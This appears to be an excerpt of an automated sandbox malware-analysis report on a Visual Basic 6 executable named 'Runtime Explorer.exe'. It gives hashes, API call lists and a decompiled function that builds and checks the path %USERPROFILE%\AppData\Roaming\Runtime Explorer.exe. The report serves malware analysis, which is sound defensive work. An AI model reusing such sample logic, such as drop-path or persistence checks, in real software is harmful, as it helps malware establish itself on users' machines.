              • Opcode ID: a6cad4b28bbebee194cb7668e0bbd5620b85ed40868f6871c5801333adbf4217
              • Instruction ID: 996c4d494a1dcaa6ac0b3908e8cf92c437ceb775abe36d85dbc6a26b9bbe962e
              • Opcode Fuzzy Hash: a6cad4b28bbebee194cb7668e0bbd5620b85ed40868f6871c5801333adbf4217
              • Instruction Fuzzy Hash: 1C512CB1D00218AADB11EFD5CC82EEFB7B8BB08704F50012FF905B7191DB785A458BA9
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 61%
              			E004131B9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v36;
				char _v52;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char* _v108;
				char _v116;
				intOrPtr* _t33;
				char* _t36;
				char* _t39;
				char* _t43;
				char _t52;
				char _t54;
				void* _t55;
				void* _t57;
				intOrPtr _t58;

				_t58 = _t57 - 0xc;
				 *[fs:0x0] = _t58;
				_v16 = _t58 - 0x64;
				_v12 = 0x4011a8;
				_t54 = 0;
				_v8 = 0;
				_t33 = _a4;
				 *((intOrPtr*)( *_t33 + 4))(_t33, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t55);
				_v116 = 0;
				_t52 = 8;
				_v28 = 0;
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v108 = L"USERPROFILE";
				_v116 = _t52;
				L00401376();
				_push( &_v52);
				_t36 =  &_v68;
				_push(_t36);
				L004012FE();
				_push(L"\\AppData\\Roaming\\");
				_push(L"Runtime Explorer.exe");
				L00401364();
				_v76 = _t36;
				_push(0);
				_push( &_v68);
				_v84 = _t52;
				_push( &_v84);
				_t39 =  &_v100;
				_push(_t39);
				L00401304();
				_push(_t39);
				L0040130A();
				L0040136A();
				_push( &_v100);
				_push( &_v84);
				_push( &_v68);
				_t43 =  &_v52;
				_push(_t43);
				_push(4);
				L00401370();
				_push(_v28);
				L004012F8();
				if(_t43 > 0) {
					_t54 = 0xffffffff;
				}
				_v36 = _t54;
				_push(0x4132b8);
				L0040135E();
				return _t43;
			}
























              0x004131bc
              0x004131cb
              0x004131d8
              0x004131db
              0x004131e2
              0x004131e4
              0x004131e7
              0x004131ed
              0x004131f2
              0x004131f5
              0x004131fc
              0x004131ff
              0x00413202
              0x00413205
              0x00413208
              0x0041320b
              0x0041320e
              0x00413215
              0x00413218
              0x00413220
              0x00413221
              0x00413224
              0x00413225
              0x0041322a
              0x0041322f
              0x00413234
              0x00413239
              0x0041323f
              0x00413240
              0x00413244
              0x00413247
              0x00413248
              0x0041324b
              0x0041324c
              0x00413251
              0x00413252
              0x0041325c
              0x00413264
              0x00413268
              0x0041326c
              0x0041326d
              0x00413270
              0x00413271
              0x00413273
              0x0041327b
              0x0041327e
              0x00413285
              0x00413287
              0x00413287
              0x0041328a
              0x0041328d
              0x004132b2
              0x004132b7

              APIs
              • __vbaVarDup.MSVBVM60 ref: 00413218
              • #666.MSVBVM60(?,?), ref: 00413225
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413234
              • __vbaVarCat.MSVBVM60(?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 0041324C
              • #645.MSVBVM60(00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413252
              • __vbaStrMove.MSVBVM60(00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 0041325C
              • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,?,?,00000000,Runtime Explorer.exe,\AppData\Roaming\,?,?), ref: 00413273
              • __vbaLenBstr.MSVBVM60(?,?,?), ref: 0041327E
              • __vbaFreeStr.MSVBVM60(004132B8,?,?,?), ref: 004132B2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$#645#666BstrListMove
              • String ID: Runtime Explorer.exe$USERPROFILE$\AppData\Roaming\
              • API String ID: 791460665-2394704127
              • Opcode ID: b51dfa843716020f90707b7e29e11eb38c24faf6b0f88f8928f1edbc13fd233d
              • Instruction ID: 8ef88586b5f0747de2335305d67283a2201f3efa1a4c12fb1985bd7ea7afe5d0
              • Opcode Fuzzy Hash: b51dfa843716020f90707b7e29e11eb38c24faf6b0f88f8928f1edbc13fd233d
              • Instruction Fuzzy Hash: 7431C3B2D00228AADB11EFE5CD469DEBBBCBB08704F10426FF905B7691DB785605CB94
              Uniqueness

              Uniqueness Score: -1.00%